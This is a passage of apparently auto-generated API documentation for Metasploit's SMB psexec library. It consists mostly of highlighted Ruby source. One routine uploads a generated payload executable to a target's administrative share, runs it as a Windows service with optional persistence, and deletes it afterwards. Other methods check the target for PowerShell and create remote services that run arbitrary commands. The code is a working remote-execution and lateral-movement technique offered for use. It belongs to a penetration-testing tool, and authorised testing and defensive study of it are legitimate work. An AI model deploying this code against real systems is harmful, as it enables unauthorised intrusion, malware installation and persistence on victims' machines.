class='tstring_content'>\\$</span><span class='regexp_end'>/</span></span><span class='comma'>,</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span> <span class='kw'>if</span> <span class='id identifier rubyid_folder_list'>folder_list</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span> <span class='op'>></span> <span class='int'>1</span>
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_connect'>connect</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_smbshare'>smbshare</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_fd'>fd</span> <span class='op'>=</span> <span class='id identifier rubyid_smb_open'>smb_open</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fileprefix'>fileprefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>rwct</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='label'>write:</span> <span class='kw'>true</span><span class='rparen'>)</span>
|
||
<span class='kw'>else</span>
|
||
<span class='id identifier rubyid_subfolder'>subfolder</span> <span class='op'>=</span> <span class='kw'>false</span>
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_connect'>connect</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_smbshare'>smbshare</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_fd'>fd</span> <span class='op'>=</span> <span class='id identifier rubyid_smb_open'>smb_open</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>rwct</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='label'>write:</span> <span class='kw'>true</span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
<span class='id identifier rubyid_exe'>exe</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_end'>'</span></span>
|
||
<span class='id identifier rubyid_opts'>opts</span> <span class='op'>=</span> <span class='lbrace'>{</span> <span class='symbol'>:servicename</span> <span class='op'>=></span> <span class='id identifier rubyid_service_name'>service_name</span><span class='comma'>,</span> <span class='symbol'>:serviceencoder</span> <span class='op'>=></span> <span class='id identifier rubyid_service_encoder'>service_encoder</span><span class='rbrace'>}</span>
|
||
<span class='kw'>begin</span>
|
||
<span class='id identifier rubyid_exe'>exe</span> <span class='op'>=</span> <span class='id identifier rubyid_generate_payload_exe_service'>generate_payload_exe_service</span><span class='lparen'>(</span><span class='id identifier rubyid_opts'>opts</span><span class='rparen'>)</span>
|
||
|
||
<span class='id identifier rubyid_fd'>fd</span> <span class='op'><<</span> <span class='id identifier rubyid_exe'>exe</span>
|
||
<span class='kw'>ensure</span>
|
||
<span class='id identifier rubyid_fd'>fd</span><span class='period'>.</span><span class='id identifier rubyid_close'>close</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='kw'>if</span> <span class='id identifier rubyid_subfolder'>subfolder</span>
|
||
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Created \\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fileprefix'>fileprefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_content'>...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>else</span>
|
||
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Created \\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_content'>...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='comment'># Disconnect from the share
|
||
</span> <span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_disconnect'>disconnect</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_smbshare'>smbshare</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
|
||
<span class='comment'># define the file location
|
||
</span> <span class='kw'>if</span> <span class='id identifier rubyid_smb_share'>smb_share</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>ADMIN$</span><span class='tstring_end'>'</span></span>
|
||
<span class='id identifier rubyid_file_location'>file_location</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>%SYSTEMROOT%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span>
|
||
<span class='kw'>elsif</span> <span class='id identifier rubyid_smb_share'>smb_share</span> <span class='op'>=~</span> <span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>^[a-zA-Z]\$$</span><span class='regexp_end'>/</span></span>
|
||
<span class='id identifier rubyid_file_location'>file_location</span> <span class='op'>=</span> <span class='id identifier rubyid_smb_share'>smb_share</span><span class='period'>.</span><span class='id identifier rubyid_slice'>slice</span><span class='lparen'>(</span><span class='int'>0</span><span class='comma'>,</span><span class='int'>1</span><span class='rparen'>)</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>:\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span>
|
||
<span class='kw'>else</span>
|
||
<span class='id identifier rubyid_file_location'>file_location</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\127.0.0.1\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_smbshare'>smbshare</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fileprefix'>fileprefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='id identifier rubyid_psexec'>psexec</span><span class='lparen'>(</span><span class='id identifier rubyid_file_location'>file_location</span><span class='comma'>,</span> <span class='kw'>false</span><span class='rparen'>)</span>
|
||
|
||
<span class='kw'>unless</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>SERVICE_PERSIST</span><span class='tstring_end'>'</span></span><span class='rbracket'>]</span>
|
||
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Deleting \\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_content'>...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='comment'>#This is not really useful but will prevent double \\ on the wire :)
|
||
</span> <span class='kw'>if</span> <span class='id identifier rubyid_smb_share'>smb_share</span> <span class='op'>=~</span> <span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>.[\\\/]</span><span class='regexp_end'>/</span></span>
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_connect'>connect</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_smbshare'>smbshare</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>begin</span>
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_delete'>delete</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fileprefix'>fileprefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>rescue</span> <span class='const'><span class='object_link'><a href="../Client.html#XCEPT-constant" title="Msf::Exploit::Remote::SMB::Client::XCEPT (constant)">XCEPT</a></span></span><span class='op'>::</span><span class='const'>ErrorCode</span> <span class='op'>=></span> <span class='id identifier rubyid_e'>e</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Delete of \\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fileprefix'>fileprefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_content'> failed: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>else</span>
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_connect'>connect</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_smbshare'>smbshare</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>begin</span>
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_delete'>delete</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>rescue</span> <span class='const'><span class='object_link'><a href="../Client.html#XCEPT-constant" title="Msf::Exploit::Remote::SMB::Client::XCEPT (constant)">XCEPT</a></span></span><span class='op'>::</span><span class='const'>ErrorCode</span> <span class='op'>=></span> <span class='id identifier rubyid_e'>e</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Delete of \\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_content'> failed: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
|
||
<h3 class="signature " id="powershell_installed?-instance_method">
|
||
|
||
#<strong>powershell_installed?</strong>(smb_share, psh_path) ⇒ <tt>Boolean</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><div class="docstring">
|
||
<div class="discussion">
|
||
|
||
|
||
</div>
|
||
</div>
|
||
<div class="tags">
|
||
|
||
<p class="tag_title">Returns:</p>
|
||
<ul class="return">
|
||
|
||
<li>
|
||
|
||
|
||
<span class='type'>(<tt>Boolean</tt>)</span>
|
||
|
||
|
||
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
</div><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
195
|
||
196
|
||
197
|
||
198
|
||
199
|
||
200
|
||
201
|
||
202
|
||
203
|
||
204
|
||
205
|
||
206
|
||
207
|
||
208
|
||
209
|
||
210
|
||
211
|
||
212
|
||
213
|
||
214
|
||
215
|
||
216
|
||
217
|
||
218
|
||
219</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/client/psexec.rb', line 195</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_powershell_installed?'>powershell_installed?</span><span class='lparen'>(</span><span class='id identifier rubyid_smb_share'>smb_share</span><span class='comma'>,</span> <span class='id identifier rubyid_psh_path'>psh_path</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_share'>share</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_smb_share'>smb_share</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span>
|
||
|
||
<span class='kw'>case</span> <span class='id identifier rubyid_smb_share'>smb_share</span><span class='period'>.</span><span class='id identifier rubyid_upcase'>upcase</span>
|
||
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>ADMIN$</span><span class='tstring_end'>'</span></span>
|
||
<span class='id identifier rubyid_path'>path</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>System32\\WindowsPowerShell\\v1.0\\powershell.exe</span><span class='tstring_end'>'</span></span>
|
||
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>C$</span><span class='tstring_end'>'</span></span>
|
||
<span class='id identifier rubyid_path'>path</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</span><span class='tstring_end'>'</span></span>
|
||
<span class='kw'>else</span>
|
||
<span class='id identifier rubyid_path'>path</span> <span class='op'>=</span> <span class='id identifier rubyid_psh_path'>psh_path</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_connect'>connect</span><span class='lparen'>(</span><span class='id identifier rubyid_share'>share</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Checking for </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_path'>path</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>if</span> <span class='id identifier rubyid_smb_file_exist?'>smb_file_exist?</span><span class='lparen'>(</span><span class='id identifier rubyid_path'>path</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>PowerShell found</span><span class='tstring_end'>'</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_psh'>psh</span> <span class='op'>=</span> <span class='kw'>true</span>
|
||
<span class='kw'>else</span>
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>PowerShell not found</span><span class='tstring_end'>'</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_psh'>psh</span> <span class='op'>=</span> <span class='kw'>false</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_disconnect'>disconnect</span><span class='lparen'>(</span><span class='id identifier rubyid_share'>share</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_psh'>psh</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
|
||
<h3 class="signature " id="psexec-instance_method">
|
||
|
||
#<strong>psexec</strong>(command, disconnect = true) ⇒ <tt>Boolean</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><div class="docstring">
|
||
<div class="discussion">
|
||
|
||
<p>Executes a single windows command.</p>
|
||
|
||
<p>If you want to retrieve the output of your command you’ll have to echo it to a .txt file and then use the <span class='object_link'><a href="#smb_read_file-instance_method" title="Msf::Exploit::Remote::SMB::Client::Psexec#smb_read_file (method)">#smb_read_file</a></span> method to retrieve it. Make sure to remove the files manually or use <span class='object_link'><a href="../../../FileDropper.html#register_files_for_cleanup-instance_method" title="Msf::Exploit::FileDropper#register_files_for_cleanup (method)">FileDropper#register_files_for_cleanup</a></span> to have the <span class='object_link'><a href="../../../FileDropper.html#cleanup-instance_method" title="Msf::Exploit::FileDropper#cleanup (method)">FileDropper#cleanup</a></span> and <span class='object_link'><a href="../../../FileDropper.html#on_new_session-instance_method" title="Msf::Exploit::FileDropper#on_new_session (method)">FileDropper#on_new_session</a></span> handlers do it for you.</p>
|
||
|
||
|
||
</div>
|
||
</div>
|
||
<div class="tags">
|
||
<p class="tag_title">Parameters:</p>
|
||
<ul class="param">
|
||
|
||
<li>
|
||
|
||
<span class='name'>command</span>
|
||
|
||
|
||
<span class='type'>(<tt>String</tt>)</span>
|
||
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>Should be a valid windows command</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
<li>
|
||
|
||
<span class='name'>disconnect</span>
|
||
|
||
|
||
<span class='type'>(<tt>Boolean</tt>)</span>
|
||
|
||
|
||
<em class="default">(defaults to: <tt>true</tt>)</em>
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>Disconnect afterwards</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
<p class="tag_title">Returns:</p>
|
||
<ul class="return">
|
||
|
||
<li>
|
||
|
||
|
||
<span class='type'>(<tt>Boolean</tt>)</span>
|
||
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>Whether everything went well</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
</div><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
98
|
||
99
|
||
100
|
||
101
|
||
102
|
||
103
|
||
104
|
||
105
|
||
106
|
||
107
|
||
108
|
||
109
|
||
110
|
||
111
|
||
112
|
||
113
|
||
114
|
||
115
|
||
116
|
||
117
|
||
118
|
||
119
|
||
120
|
||
121
|
||
122
|
||
123
|
||
124
|
||
125
|
||
126
|
||
127
|
||
128
|
||
129
|
||
130
|
||
131
|
||
132
|
||
133
|
||
134
|
||
135
|
||
136
|
||
137
|
||
138
|
||
139
|
||
140
|
||
141
|
||
142
|
||
143
|
||
144
|
||
145
|
||
146
|
||
147
|
||
148
|
||
149
|
||
150
|
||
151
|
||
152
|
||
153
|
||
154
|
||
155
|
||
156
|
||
157
|
||
158
|
||
159
|
||
160
|
||
161
|
||
162
|
||
163
|
||
164
|
||
165
|
||
166
|
||
167
|
||
168
|
||
169
|
||
170
|
||
171
|
||
172
|
||
173
|
||
174
|
||
175
|
||
176
|
||
177
|
||
178
|
||
179
|
||
180
|
||
181
|
||
182
|
||
183
|
||
184
|
||
185
|
||
186
|
||
187
|
||
188
|
||
189
|
||
190
|
||
191
|
||
192
|
||
193</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/client/psexec.rb', line 98</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_psexec'>psexec</span><span class='lparen'>(</span><span class='id identifier rubyid_command'>command</span><span class='comma'>,</span> <span class='id identifier rubyid_disconnect'>disconnect</span><span class='op'>=</span><span class='kw'>true</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_remove_socket'>remove_socket</span><span class='lparen'>(</span><span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_sock'>sock</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_connect'>connect</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\IPC$</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_handle'>handle</span> <span class='op'>=</span> <span class='id identifier rubyid_dcerpc_handle_target'>dcerpc_handle_target</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>367abb81-9844-35f1-ad32-98f038001003</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>2.0</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>ncacn_np</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\svcctl</span><span class='tstring_end'>"</span></span><span class='rbracket'>]</span><span class='comma'>,</span> <span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Binding to </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_handle'>handle</span><span class='embexpr_end'>}</span><span class='tstring_content'> ...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_dcerpc_bind'>dcerpc_bind</span><span class='lparen'>(</span><span class='id identifier rubyid_handle'>handle</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Bound to </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_handle'>handle</span><span class='embexpr_end'>}</span><span class='tstring_content'> ...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Obtaining a service manager handle...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
|
||
<span class='id identifier rubyid_svc_client'>svc_client</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/DCERPC.html" title="Rex::Proto::DCERPC (module)">DCERPC</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/DCERPC/SVCCTL.html" title="Rex::Proto::DCERPC::SVCCTL (module)">SVCCTL</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/DCERPC/SVCCTL/Client.html" title="Rex::Proto::DCERPC::SVCCTL::Client (class)">Client</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../../../../Rex/Proto/DCERPC/SVCCTL/Client.html#initialize-instance_method" title="Rex::Proto::DCERPC::SVCCTL::Client#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='id identifier rubyid_dcerpc'>dcerpc</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_scm_handle'>scm_handle</span><span class='comma'>,</span> <span class='id identifier rubyid_scm_status'>scm_status</span> <span class='op'>=</span> <span class='id identifier rubyid_svc_client'>svc_client</span><span class='period'>.</span><span class='id identifier rubyid_openscmanagerw'>openscmanagerw</span><span class='lparen'>(</span><span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='rparen'>)</span>
|
||
|
||
<span class='kw'>if</span> <span class='id identifier rubyid_scm_status'>scm_status</span> <span class='op'>==</span> <span class='const'>ERROR_ACCESS_DENIED</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>ERROR_ACCESS_DENIED opening the Service Manager</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='kw'>return</span> <span class='kw'>false</span> <span class='kw'>unless</span> <span class='id identifier rubyid_scm_handle'>scm_handle</span>
|
||
|
||
<span class='kw'>if</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>SERVICE_PERSIST</span><span class='tstring_end'>'</span></span><span class='rbracket'>]</span>
|
||
<span class='id identifier rubyid_opts'>opts</span> <span class='op'>=</span> <span class='lbrace'>{</span> <span class='symbol'>:start</span> <span class='op'>=></span> <span class='const'><span class='object_link'><a href="../../../Windows_Constants.html#SERVICE_AUTO_START-constant" title="Msf::Exploit::Windows_Constants::SERVICE_AUTO_START (constant)">SERVICE_AUTO_START</a></span></span> <span class='rbrace'>}</span>
|
||
<span class='kw'>else</span>
|
||
<span class='id identifier rubyid_opts'>opts</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Creating the service...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_svc_handle'>svc_handle</span><span class='comma'>,</span> <span class='id identifier rubyid_svc_status'>svc_status</span> <span class='op'>=</span> <span class='id identifier rubyid_svc_client'>svc_client</span><span class='period'>.</span><span class='id identifier rubyid_createservicew'>createservicew</span><span class='lparen'>(</span><span class='id identifier rubyid_scm_handle'>scm_handle</span><span class='comma'>,</span> <span class='id identifier rubyid_service_name'>service_name</span><span class='comma'>,</span> <span class='id identifier rubyid_display_name'>display_name</span><span class='comma'>,</span> <span class='id identifier rubyid_command'>command</span><span class='comma'>,</span> <span class='id identifier rubyid_opts'>opts</span><span class='rparen'>)</span>
|
||
|
||
<span class='kw'>case</span> <span class='id identifier rubyid_svc_status'>svc_status</span>
|
||
<span class='kw'>when</span> <span class='const'>ERROR_SUCCESS</span>
|
||
<span class='id identifier rubyid_vprint_good'>vprint_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Successfully created the service</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>when</span> <span class='const'>ERROR_SERVICE_EXISTS</span>
|
||
<span class='id identifier rubyid_service_exists'>service_exists</span> <span class='op'>=</span> <span class='kw'>true</span>
|
||
<span class='id identifier rubyid_print_warning'>print_warning</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Service already exists, opening a handle...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_svc_handle'>svc_handle</span> <span class='op'>=</span> <span class='id identifier rubyid_svc_client'>svc_client</span><span class='period'>.</span><span class='id identifier rubyid_openservicew'>openservicew</span><span class='lparen'>(</span><span class='id identifier rubyid_scm_handle'>scm_handle</span><span class='comma'>,</span> <span class='id identifier rubyid_service_name'>service_name</span><span class='rparen'>)</span>
|
||
